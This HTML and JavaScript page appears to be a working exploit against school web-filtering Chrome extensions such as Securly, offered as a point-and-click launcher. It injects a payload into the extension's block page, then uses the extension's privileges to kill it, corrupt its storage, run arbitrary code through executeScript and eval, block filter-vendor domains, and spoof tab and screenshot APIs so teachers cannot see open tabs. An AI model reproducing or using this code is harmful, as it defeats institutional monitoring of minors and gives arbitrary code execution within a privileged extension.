<html><head><script>
document.write(`<iframe class="classroom" frame-border="0" src="cLhrome-extension://ghlpmldmjjhmdgmneoaibbegkjjbonbk/pages/blockPage.html?blockurl={%22hostname%22:%22%3Ca%20href=%27//%27%20rel=%27opener%27%20target=%27_blank%27%3Etest%3C/a%3E%22}"></iframe> <style> .classroom {height: 100%; width: 100%; border: none;}`);
  frames[0]. document.write(
    ` <html>
  <body>
    <center>
      <head>
        <h1>[Point Blank Swap Launcher]</h1>
        <center><h1>---Disabling---</h1></center>

        <center><button id="soft">Soft Kill</button></center>
        <center><button id="hard">Hard Kill</button></center>
        <center><button id="cookies">Kill Extension By Cache</button></center>
        <center><button id="reload">Reload Blocker</button></center>
        <center>
        <hr/>

          <center><h1>---Scripts---</h1></center>
          <center>
       <select id="scripts">
<option> Pick  a script </option>
<option value="dns">
       Dns emulator
       </option>
       <option value="hide">
Hide Tabs from teachers
</option>
<option value="when">
Run Custom code on extension click
</option>
<option value="dnsonclick">
Toggle DNS Emulator on extension click
</option>
<option value="goofy">
Display Goofy Notification
</option>
<option value="policy">
Display Extension policy
</option>
<option value="google">
Open Cool Looking Window
</option>
<option value="visible"> Open Visible Window </option>

       </select>
       <button id="run_script">Run Script</button>
       
       <hr/>
              <center></center>
              <center>
                <center>
                  <center><h3>Run scripts as background</h3></center>
                  <h3 id="permissions">
                  </h3>
                  <h5> You can see the apis your extension holds below If you want to be able to run scripts on chrome pages, go to chrome://flags/#extensions-on-chrome-urls and enable it from there, then restart. If you would like to run scripts directly on this page, use the button below, for the code you put for example chrome.tabs.create and for arguments you put {"url":"https://www.google.com"}, make sure not to use any parentheses, if you're going to do an alert use alert then for argument put  "Your message here". Now if you're using run on extension click, you can use regular code, and run as background is going to your scripts as background. Note: Running scripts on extension click may not work if your extension doesn't have one, we've confirmed this doesn't work for <li> Securly </li><li> Confirmed to work with Securly Classroom</li><li> Yet discoverered if this works for other extensions </li></h5>
                  <textarea id="code" placeholder="Code Goes Here..."></textarea>
                  <input id="args" placeholder="Arguments go here...">
                  </center>
                <center>
                <button id="when">Run on extension click</button>
                <button id="rundir">Run on this page</button>
                  <button id="background">Run on this page as background</button>
                  <button id="reset">Reset Background Scripts</button>
                </center>
                <center></center>
      </head>
    </center>
  </body>
</html>

<style>
  box-sizing: border-box;

    body {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      transition: background 0.2s linear;
    }
    .checkbox {
      opacity: 0;
      position: absolute;
    }

    .label {
      width: 50px;
      height: 26px;
      background-color: #111;
      display: flex;
      border-radius: 50px;
      align-items: center;
      justify-content: space-between;
      padding: 5px;
      position: relative;
      transform: scale(1.5);
    }

    .ball {
      width: 20px;
      height: 20px;
      background-color: white;
      position: absolute;
      top: 2px;
      left: 2px;
      border-radius: 50%;
      transition: transform 0.2s linear;
    }

    .checkbox:checked + .label .ball {
      transform: translateX(24px);
    }

   textarea{border-radius: 25px; margin: 1 auto;margin-center: auto;margin-center: auto; text-align: center; align: center; display:inline-block;height:400px}*{box-sizing:border-box}body{padding:13px;font-size:110%;color:#fff;background-color:#2e2e31}h1{text-align:center;font-size:70px}h2{text-align:left;font-size:175%}input {border-radius: 6px; color:#000;font-size:15px} textarea {border-radius: 21px; color:#000;font-size:15px} button,pre { border-radius: 12px; color:#000;font-size:15px}h1,h2,h3,h4,button,label,p,select{font-family:Roboto,sans-serif}hr{border:none;border-bottom:3px solid #fff}input,kbd,pre,textarea{font-family:monospace;border:none}input,select{background-color:#fff;border-radius:15px; padding:13px 17px;border:none}button,input{background-color:#fff;padding:13px 100px;margin:20 5px 5px 0}input{width:600px;border-radius:10px}textarea{white-space:pre;float:center;width:60%;border-radius:25px; 0 0 10px;resize:none;background-color:#99edc3;margin-bottom:15px}pre{border-radius:25; 10px 10px 0;padding:13px;float:right;margin:0 0 25px;width:40%;overflow-y:scroll;word-break:break-all;white-space:pre-line;background-color:#1c8e40}button{border:none; cursor:pointer;transition:filter 250ms}button:hover{filter:brightness(.8)}.gg{background-color:#99edc3}a{color:#99edc3;transition:color 250ms}a:hover{color:#1c8e40}</style>`
  ),
   document.getElementById("when").addEventListener("click", function () {
    opener.chrome.browserAction.onClicked.addListener(function () {
      opener.chrome.tabs.query(
        {
          active: true,
          currentWindow: true,
        },
        (tab) => {
          opener.chrome.tabs.executeScript(tab[0].id, {
            code: document.getElementById("code").value,
          });
        }
      );
    }),
      alert(
        "Click your extension on any page to see your code, make sure your extension has a browser action for this to work."
      );
  });
  document.getElementById("rundir").addEventListener("click", function () {
    let command = document.getElementById("code").value;
    let argPrompt = document.getElementById("args").value;
    let args = JSON.parse(`[${argPrompt}]`);

    let target = self;
    command.split(".").forEach((sub) => (target = target[sub]));

    target(...args);
  });
document.getElementById("when").addEventListener(
  "click",
  function () {
    let command = document.getElementById("code").value;
    let argPrompt = document.getElementById("args").value;
    let args = JSON.parse(`[${argPrompt}]`);

    let target = opener.chrome.extension.getBackgroundPage(),
      self;
    command.split(".").forEach((sub) => (target = target[sub]));

    target(...args);
  },
  !1
),
document.getElementById("cookies").addEventListener(
  "click",
  function () {
    if (
      confirm(
        "This will slow your device for a estimated time of 15 seconds, if this page freezes, you will still be able to navigate to other tabs, continue?"
      )
    ) {
      for (var i = 0; i < localStorage.length; i++)
        if (localStorage.key(i) !== `${localStorage.key}`)
          localStorage[localStorage.key(i)] = this.undo ? "" : "-";
      (this.background ? swamp.background : window).close();
    } else {
      return;
    }
  },
  !1
),
  document.getElementById("hard").addEventListener("click", function () {
    (localStorage.cluster =
      "UNKNOWN_SCHOOL, " +
      atob(
        "OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5"
      )),
      frames[0].chrome.extension.getBackgroundPage().location.reload();
    document.getElementById("hard").innerHTML = "Disabled!";
  }),
  document.getElementById("soft").addEventListener(
    "click",
    function () {
      document.getElementById("soft").innerHTML = "Disabled!";
      frames[0].chrome.extension.getBackgroundPage().close();
    },
    !1
  ),
  opener.chrome.runtime.getManifest().permissions.forEach((show) => {
    document.getElementById("permissions").innerHTML += `<br> ${show} <br/>`;
  });
document.getElementById("reset").addEventListener(
  "click",
  function () {
    (onbeforeunload = null),
      (location.href = `${frames[0].location.protocol}${document.domain}${frames[0].location.pathname}`);
  },
  !1
),
  document.getElementById("run_script").addEventListener(
    "click",
    function () {
      var scripts = document.getElementById("scripts");
      if (scripts.value == "dnsonclick") {
        function block() {
          return { redirectUrl: "javascript:" };
        }
        var blocking = false;
        function toggle() {
          if (blocking) {
            frames[0].chrome.webRequest.onBeforeRequest.removeListener(block);
          } else {
            frames[0].chrome.webRequest.onBeforeRequest.addListener(
              block,
              {
                urls: [
                  "*://*.securly.com/*",
                  "*://*.blocked.com/*",
                  "*://*.lightspeedsystems.com/*",
                  "*://*.goguardian.com/*",
                  "*://*.blocking.com/*",
                  "*://*.block.com/*",
                ],
              },
              ["blocking"]
            );
          }
          blocking = !blocking;
          alert("Emulated DNS unblocker is " + (blocking ? "on!" : "off!"));
        }
        toggle();
        frames[0].chrome.browserAction.onClicked.addListener(toggle);
        alert("Click your extension to toggle dns emulator");
      }
      if (scripts.value == "dns") {
        frames[0].chrome.webRequest.onBeforeRequest.addListener(
          () => {
            return { redirectUrl: "javascript:" };
          },
          {
            urls: [
              "*://*.securly.com/*",
              "*://*.blocked.com/*",
              "*://*.lightspeedsystems.com/*",
              "*://*.goguardian.com/*",
              "*://*.blocking.com/*",
              "*://*.block.com/*",
            ],
          },
          ["blocking"]
        );
        alert("Done, DNS Emulator has been turned on, keep this page open");
      }
      if (scripts.value == "visible") {
        frames[0].chrome.tabs.captureVisibleTabAsync =
          frames[0].chrome.tabs.captureVisibleTabAsync || screenshot_old;
        frames[0].chrome.windows.getAllAsync =
          frames[0].chrome.windows.getAllAsync || get_tabs_old;
        clearInterval(spoof_int);
        if (spoof_int)
          alert("Your teacher can now see all open tabs and windows!");
        spoof_int = null;
      }
      if (scripts.value == "goofy") {
        frames[0].chrome.notifications.create(null, {
          iconUrl:
            "https://upload.wikimedia.org/wikipedia/en/9/9a/Trollface_non-free.png",
          type: "basic",
          title: `Important Message`,
          message:
            "We've been trying to reach you concerning your vehicle's extended warranty. You should've received a notice in the mail about your car's extended warranty eligibility. Since we've not gotten a response, we're giving you a final courtesy call before we close out your file. Press 2 to be removed and placed on our do-not-call list. To speak to someone about possibly extending or reinstating your vehicle's warranty, press 1 to speak with a warranty specialist. ",
        });
      }
      if (scripts.value == "policy") {
        frames[0].chrome.storage.local.get("policy", (json) => {
          alert(JSON.stringify(json));
        });
      }
      if (scripts.value == "when") {
        document.getElementById("code").value = "eval(prompt('Code?'))";
        document.getElementById("code").scrollIntoView();
      }
      if (scripts.value == "hide") {
        var spoof_int,
          visible_id = 0,
          screenshot_old =
            screenshot_old || frames[0].chrome.tabs.captureVisibleTabAsync,
          get_tabs_old = get_tabs_old || frames[0].chrome.windows.getAllAsync,
          get_tabs_new = function () {
            return new Promise((resolve, reject) => {
              get_tabs_old({
                populate: true,
                windowTypes: ["normal"],
              }).then((tabs) => {
                tabs.forEach((tab) => {
                  if (tab.id === visible_id) resolve([tab]);
                });
              });
            });
          };
        frames[0].chrome.windows.create({ url: "https://google.com" }, (win) => {
          visible_id = win.id;
          spoof_int = setInterval(() => {
            frames[0].chrome.windows.getLastFocused((window) => {
              var visible = window.id === visible_id;
              frames[0].chrome.tabs.captureVisibleTabAsync = visible
                ? screenshot_old
                : null;
              frames[0].chrome.windows.getAllAsync = visible ? get_tabs_new : null;
            });
          }, 5);
        });
      }
      if (scripts.value == "google") {
        frames[0].chrome.windows.create({
          url: "https://www.google.com",
          type: "popup",
        });
      }
    },
    !1
  );

</script></head><body><iframe class="classroom" frame-border="0" src="cLhrome-extension://ghlpmldmjjhmdgmneoaibbegkjjbonbk/pages/blockPage.html?blockurl={%22hostname%22:%22%3Ca%20href=%27//%27%20rel=%27opener%27%20target=%27_blank%27%3Etest%3C/a%3E%22}"></iframe> <style> .classroom {height: 100%; width: 100%; border: none;}
</style></body></html>